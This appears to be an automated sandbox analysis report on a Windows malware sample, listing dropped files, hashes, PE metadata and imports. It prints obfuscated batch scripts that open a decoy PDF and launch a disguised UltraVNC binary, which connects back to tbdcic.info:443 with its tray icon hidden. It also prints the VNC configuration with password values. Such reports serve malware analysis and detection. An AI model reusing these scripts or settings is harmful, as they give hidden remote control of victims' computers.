                                                                          MD5:41F0189B83E9D493B86D7182B3514F9D
                                                                          SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                                          SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                                          SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1001
                                                                          Entropy (8bit):5.502266483327757
                                                                          Encrypted:false
                                                                          SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                                          MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                                          SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                                          SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                                          SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1001
                                                                          Entropy (8bit):5.502266483327757
                                                                          Encrypted:false
                                                                          SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                                          MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                                          SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                                          SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                                          SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                          Category:dropped
                                                                          Size (bytes):605114
                                                                          Entropy (8bit):7.931189302613814
                                                                          Encrypted:false
                                                                          SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                          MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                          SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                          SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                          SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                          Malicious:false
                                                                          Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:Generic INItialization configuration [admin]
                                                                          Category:dropped
                                                                          Size (bytes):858
                                                                          Entropy (8bit):5.233343202654504
                                                                          Encrypted:false
                                                                          SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                                          MD5:C55EEA597023B8C774986495ECAE5B33
                                                                          SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                                          SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                                          SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                                          Malicious:false
                                                                          Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1945368
                                                                          Entropy (8bit):6.532894678367002
                                                                          Encrypted:false
                                                                          SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                          MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                          SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                          SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                          SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\Xv6Ya.d8LhT, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1945368
                                                                          Entropy (8bit):6.532894678367002
                                                                          Encrypted:false
                                                                          SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                          MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                          SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                          SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                          SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):867840
                                                                          Entropy (8bit):6.386550733462827
                                                                          Encrypted:false
                                                                          SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                          MD5:0F568F6C821565AB9FF45C7457953789
                                                                          SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                          SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                          SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:Generic INItialization configuration [admin]
                                                                          Category:dropped
                                                                          Size (bytes):858
                                                                          Entropy (8bit):5.233343202654504
                                                                          Encrypted:false
                                                                          SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                                          MD5:C55EEA597023B8C774986495ECAE5B33
                                                                          SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                                          SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                                          SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                                          Malicious:false
                                                                          Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):867840
                                                                          Entropy (8bit):6.386550733462827
                                                                          Encrypted:false
                                                                          SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                          MD5:0F568F6C821565AB9FF45C7457953789
                                                                          SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                          SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                          SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.9513802823208
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:T8xrZb7nBL.exe
                                                                          File size:1'670'955 bytes
                                                                          MD5:1677bd5b561b890396ae1816066ca481
                                                                          SHA1:9ba4b30a162a261b27397bc1dc3736b94b786f65
                                                                          SHA256:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
                                                                          SHA512:bac8a3d2e270caf1d00b812d480562ffced7a67d14ac45e1730fb94d5dadf7f5c5fb618133e35f4a7246d16fa53cbada05ea1671c2919973d0e9ccd4b3be3be7
                                                                          SSDEEP:24576:WKWs4Estw5N4jqjvXeBKNiVCK/A52aw08KdVUBRAWwPnA5jF0zF77/voe2D7UGxV:TFzseH4jYXeBExKYhd3Yb0zZoe2DNL
                                                                          TLSH:767523547793C9F4EA57227408A15C135FA3ED290A40288F33CDF6127A36652FA2BDB7
                                                                          File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                                          Icon Hash:357561d6dad24d55
                                                                          Entrypoint:0x41382f
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:1d1577d864d2da06952f7affd8635371
                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push FFFFFFFFh
                                                                          push 00416E98h
                                                                          push 004139C0h
                                                                          mov eax, dword ptr fs:[00000000h]
                                                                          push eax
                                                                          mov dword ptr fs:[00000000h], esp
                                                                          sub esp, 68h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [ebp-18h], esp
                                                                          xor ebx, ebx
                                                                          mov dword ptr [ebp-04h], ebx
                                                                          push 00000002h
                                                                          call dword ptr [004151DCh]
                                                                          pop ecx
                                                                          or dword ptr [0041B9E4h], FFFFFFFFh
                                                                          or dword ptr [0041B9E8h], FFFFFFFFh
                                                                          call dword ptr [004151E0h]
                                                                          mov ecx, dword ptr [004199C4h]
                                                                          mov dword ptr [eax], ecx
                                                                          call dword ptr [004151E4h]
                                                                          mov ecx, dword ptr [004199C0h]
                                                                          mov dword ptr [eax], ecx
                                                                          mov eax, dword ptr [004151E8h]
                                                                          mov eax, dword ptr [eax]
                                                                          mov dword ptr [0041B9E0h], eax
                                                                          call 00007F4DECB06F22h
                                                                          cmp dword ptr [00419780h], ebx
                                                                          jne 00007F4DECB06E0Eh
                                                                          push 004139B8h
                                                                          call dword ptr [004151ECh]
                                                                          pop ecx
                                                                          call 00007F4DECB06EF4h
                                                                          push 00419050h
                                                                          push 0041904Ch
                                                                          call 00007F4DECB06EDFh
                                                                          mov eax, dword ptr [004199BCh]
                                                                          mov dword ptr [ebp-6Ch], eax
                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                          push eax
                                                                          push dword ptr [004199B8h]
                                                                          lea eax, dword ptr [ebp-64h]
                                                                          push eax
                                                                          lea eax, dword ptr [ebp-70h]
                                                                          push eax
                                                                          lea eax, dword ptr [ebp-60h]
                                                                          push eax
                                                                          call dword ptr [004151F4h]
                                                                          push 00419048h
                                                                          push 00419000h
                                                                          call 00007F4DECB06EACh
                                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17324 | 0xc8 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c000 | 0x309f0 | .rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x15000 | 0x364 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                          .text | 0x1000 | 0x130f0 | 0x13200 | a86014994324ad6f47bddf386fd89176 | False | 0.6081495098039216 | data | 6.614408281478693 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata | 0x15000 | 0x3560 | 0x3600 | 9abc217bd20b39b1db2f57ddf9bc789c | False | 0.4381510416666667 | data | 5.5938980842785995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data | 0x19000 | 0x29ec | 0x800 | 4c129856aeef51c872b4a2f6db01e9bd | False | 0.44580078125 | data | 3.8126171673069433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc | 0x1c000 | 0x309f0 | 0x30a00 | 64273c62ea7bfbe17a6e55349807dc90 | False | 0.7267683563624678 | data | 7.231510619965348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                          RT_ICON | 0x1c280 | 0x18de | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | Russian | Russia | 0.9696826892868363
                                                                          RT_ICON | 0x1db60 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | Russian | Russia | 0.08974964572508266
                                                                          RT_ICON | 0x21d88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Russian | Russia | 0.12935684647302906
                                                                          RT_ICON | 0x24330 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | Russian | Russia | 0.16553254437869822
                                                                          RT_ICON | 0x25d98 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.21106941838649157
                                                                          RT_ICON | 0x26e40 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Russian | Russia | 0.29508196721311475
                                                                          RT_ICON | 0x277c8 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | Russian | Russia | 0.33313953488372094
                                                                          RT_ICON | 0x27e80 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.4592198581560284
                                                                          RT_GROUP_ICON | 0x282e8 | 0x76 | data | Russian | Russia | 0.7457627118644068
                                                                          RT_VERSION | 0x28360 | 0x350 | data | | | 0.4693396226415094
                                                                          RT_MANIFEST | 0x286b0 | 0x33c | ASCII text, with CRLF line terminators | English | United States | 0.501207729468599
DLL | Import
COMCTL32.dll |
SHELL32.dll | SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll | CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll | FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll | GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll | CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll | SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll | SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
